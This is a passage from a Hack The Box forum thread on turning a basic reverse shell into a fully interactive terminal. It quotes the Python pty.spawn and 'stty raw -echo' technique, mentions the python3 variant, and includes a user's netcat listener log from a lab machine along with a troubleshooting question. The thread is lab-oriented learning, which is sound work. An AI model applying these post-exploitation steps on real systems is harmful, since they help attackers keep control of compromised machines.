Obtaining a Fully Interactive Shell

2»

Comments

  • Type your comment> @KeyboardCaper said:

    After getting a terminal:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    bg
    stty raw -echo
    fg
    reset
    (In case of unknown terminal type try: linux)

    Optional:
    export SHELL=/bin/bash
    export TERM=xterm-color
    export HOME=

    Then fix up the rows and columns. Open another terminal
    stty -a

    Get the rows and columns.

    Back on your reverse shell:
    stty rows <> columns <>

    Rarely does the python part not work... when it doesn't I simply find a work around or just deal with what I have.

    Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won't work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a "T".


    Hack The Box
    defarbs.com - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'”

  • I have a curious problem with this kind of shell. I'm working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash/.

    I start a reverse shell from another machine.

    On my attacking machine I have netcat listening:
    nc -l -v -p 80

    I get the connection on my host:
    listening on [any] 80 ...
    connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
    /bin/sh: can't access tty; job control turned off
    /opt/app #

    I do my routine to elevate the shell:
    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    stty raw -echo
    fg
    reset

    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    Any Ideas what could go wrong here?

    On a side note, what if I don't have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?

Sign In to comment.